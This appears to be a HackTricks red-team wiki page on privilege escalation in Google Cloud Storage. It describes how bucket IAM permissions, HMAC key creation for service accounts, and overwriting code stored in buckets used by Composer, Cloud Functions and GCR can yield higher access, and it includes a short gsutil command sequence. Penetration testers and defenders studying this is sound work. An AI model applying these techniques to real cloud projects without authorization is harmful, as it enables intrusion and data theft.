GCP - Storage Privesc

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Storage

Basic Information:

pageGCP - Storage Enum

storage.objects.get

This permission allows you to download files stored inside Cloud Storage. This will potentially allow you to escalate privileges because in some occasions sensitive information is saved there. Moreover, some GCP services stores their information in buckets:

  • GCP Composer: When you create a Composer Environment the code of all the DAGs will be saved inside a bucket. These tasks might contain interesting information inside of their code.

  • GCR (Container Registry): The image of the containers are stored inside buckets, which means that if you can read the buckets you will be able to download the images and search for leaks and/or source code.

storage.objects.setIamPolicy

You can give you permission to abuse any of the previous scenarios of this section.

storage.buckets.setIamPolicy

For an example on how to modify permissions with this permission check this page:

pageGCP - Public Buckets Privilege Escalation

storage.hmacKeys.create

Cloud Storage's "interoperability" feature, designed for cross-cloud interactions like with AWS S3, involves the creation of HMAC keys for Service Accounts and users. An attacker can exploit this by generating an HMAC key for a Service Account with elevated privileges, thus escalating privileges within Cloud Storage. While user-associated HMAC keys are only retrievable via the web console, both the access and secret keys remain perpetually accessible, allowing for potential backup access storage. Conversely, Service Account-linked HMAC keys are API-accessible, but their access and secret keys are not retrievable post-creation, adding a layer of complexity for continuous access.

# Create key
gsutil hmac create <sa-email>

# Configure gsutil to use it
gsutil config -a

# Use it
gsutil ls gs://[BUCKET_NAME]

Another exploit script for this method can be found here.

storage.objects.create, storage.objects.delete = Storage Write permissions

In order to create a new object inside a bucket you need storage.objects.create and, according to the docs, you need also storage.objects.delete to modify an existent object.

A very common exploitation of buckets where you can write in cloud is in case the bucket is saving web server files, you might be able to store new code that will be used by the web application.

Composer

Composer is Apache Airflow managed inside GCP. It has several interesting features:

  • It runs inside a GKE cluster, so the SA the cluster uses is accessible by the code running inside Composer

  • It stores the code in a bucket, therefore, anyone with write access over that bucket is going to be able to change/add a DGA code (the code Apache Airflow will execute) Then, if you have write access over the bucket Composer is using to store the code, you can privesc to the SA running in the GKE cluster.

Cloud Functions

  • Cloud Functions code is stored in Storage, so overwriting it, it's possible to execute arbitrary code.

App Engine

  • App Engine source code is stored in buckets, overwriting the code it could be possible to execute arbitrary code. THIS IS NOT POSSIBLE

  • It looks like container layers are stored in the bucket, maybe changing those?

GCR

  • Google Container Registry stores the images inside buckets, if you can write those buckets you might be able to move laterally to where those buckets are being run.

    • The bucket used by GCR will have an URL similar to gs://<eu/usa/asia/nothing>.artifacts.<project>.appspot.com (The top level subdomains are specified here).

References

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Last updated